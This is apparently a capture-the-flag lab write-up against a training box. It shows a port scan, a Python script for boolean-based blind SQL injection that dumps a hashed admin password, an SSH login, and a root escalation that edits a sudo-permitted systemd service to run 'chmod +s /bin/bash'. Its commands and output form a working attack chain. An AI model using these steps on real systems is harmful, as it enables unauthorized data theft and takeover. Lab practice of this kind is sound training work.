In this target machine, let’s try not to use SQLmap. This way, we can practice more effectively for the OSCP exam conditions

0x00 Recon

Use rustscan for scanning.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
rustscan -a 10.10.93.26

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.93.26:22
Open 10.10.93.26:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 04:23 EDT
Initiating Ping Scan at 04:23
Scanning 10.10.93.26 [2 ports]
Completed Ping Scan at 04:23, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:23
Completed Parallel DNS resolution of 1 host. at 04:23, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 5, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 04:23
Scanning 10.10.93.26 [2 ports]
Discovered open port 22/tcp on 10.10.93.26
Discovered open port 80/tcp on 10.10.93.26
Completed Connect Scan at 04:23, 0.30s elapsed (2 total ports)
Nmap scan report for 10.10.93.26
Host is up, received conn-refused (0.30s latency).
Scanned at 2023-06-17 04:23:48 EDT for 1s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack


It appears that this server has enabled SSH and HTTP ports.
Let’s first visit website and take a look

After taking a look at this website
We can notice that this page appears to have an SQL injection vulnerability.

When we input “1 and 1 = 1” it displays correctly, but when we input “1 and 1 = 0 –” it returns an error.

0x01 SQLI

Here, we can utilize “SQLME0w” developed by Steven Meow
and with slight modifications, to extract data from the SQL.

SQLME0w: https://github.com/stevenyu113228/SQLME0w

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
def boolean_based_blind(condition):
    url = 'http://10.10.93.26/products/' # change me
    query =  condition # change me
    response = requests.get(url+query+"--") # maybe change me
    
    if int(response.status_code) == 200: # change me to other keyword or length
        return True
    else:
        return False

def test():
    meow = boolean_based_blind("1 and 1 = 1 ")
    print("Intend True: ", meow)
    meowmeow = boolean_based_blind("1 and 1 = 0")
    print("Intend False: ", meowmeow)
    if meow and not meowmeow:
        print("✅ Test success 🐱🐱🐱🐱🐱🐱🐱🐱🐱")
    else:
        print("❌ Test fail 😿😿😿😿😿😿😿😿😿😿")
    # print(boolean_based_blind("1=1")) # Return True
    # print(boolean_based_blind("1=0")) # Return False

executing the program for verification

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

└─$ python3 SQLME0w_MySQL.py

▒█▀▀▀█ ▒█▀▀█ ▒█░░░ ▒█▀▄▀█ ▒█▀▀▀ █▀▀█ █░░░█
░▀▀▀▄▄ ▒█░▒█ ▒█░░░ ▒█▒█▒█ ▒█▀▀▀ █▄▀█ █▄█▄█
▒█▄▄▄█ ░▀▀█▄ ▒█▄▄█ ▒█░░▒█ ▒█▄▄▄ █▄▄█ ░▀░▀░ for MySQL

 
 🐱 (0) System Test
 🐱 (1) Get Current DB
 🐱 (2) Get All DBS
 🐱 (3) Get Tables
 🐱 (4) Get Columns
 🐱 (5) Get Data
Your Option : 0
Threads (Suggest 10): 4
Intend True:  True
Intend False:  False
✅ Test success 🐱🐱🐱🐱🐱🐱🐱🐱🐱

Afterward, we can retrieve the first flag from the “user” table.

Simultaneously, we can also obtain the username and hashed password of an account named “server-admin” from the “system_user” table. However, since the password appears to be hashed, we can attempt to crack it using John the Ripper (John)

great! we have server-admin password
let’s try to log in 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└─$ ssh server-admin@10.10.93.26                   
server-admin@10.10.93.26's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0


8 packages can be updated.
0 updates are security updates.


################################################################################
#                        Ducky Inc. Web Server 00080012                        #
#            This server is for authorized Ducky Inc. employees only           #
#                  All actiions are being monitored and recorded               #
#                    IP and MAC addresses have been logged                     #
################################################################################
Last login: Wed Aug 12 20:09:36 2020 from 192.168.86.65
server-admin@duckyinc:~$ ls
flag2.txt
server-admin@duckyinc:~$ cat flag2.txt 
thm{4xxxxxxxxxxe}

0x02 Privilege Escalation

The first thing we should do is to examine our own permissions to determine what actions we are allowed to perform.

1
2
3
4
5
6
7
server-admin@duckyinc:~$ sudo -l
Matching Defaults entries for server-admin on duckyinc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User server-admin may run the following commands on duckyinc:
    (root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service, /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, sudoedit
        /etc/systemd/system/duckyinc.service

uhmmm… it appears that we have the ability to execute certain systemctl operations with root privileges.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
server-admin@duckyinc:~$ cat /etc/systemd/system/duckyinc.service
[Service]

Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"

[Install]
WantedBy=multi-user.target

server-admin@duckyinc:~$ sudo /bin/systemctl daemon-reload
server-admin@duckyinc:~$ sudo /bin/systemctl restart duckyinc.service
server-admin@duckyinc:~$ ls -al /bin/bash 
-rwsr-sr-x 1 root root 1113504 Jun  6  2019 /bin/bash

try https://gtfobins.github.io/gtfobins/systemctl/
we can perform any operation with root privileges.

1
2
3
4
5
server-admin@duckyinc:~$ /bin/bash -p
bash-4.4# ls
flag2.txt
bash-4.4# whoami
root

ok we are root and at the end of the task, we need to modify the homepage of this website. (/var/www/duckyinc/templates/index.html)

Finally, we can obtain the last flag in the root directory!!!

1
2
3
4
5
bash-4.4# cd /root
bash-4.4# ls
flag3.txt
bash-4.4# cat fl*
thm{mxxxxxxxxxxxxxd}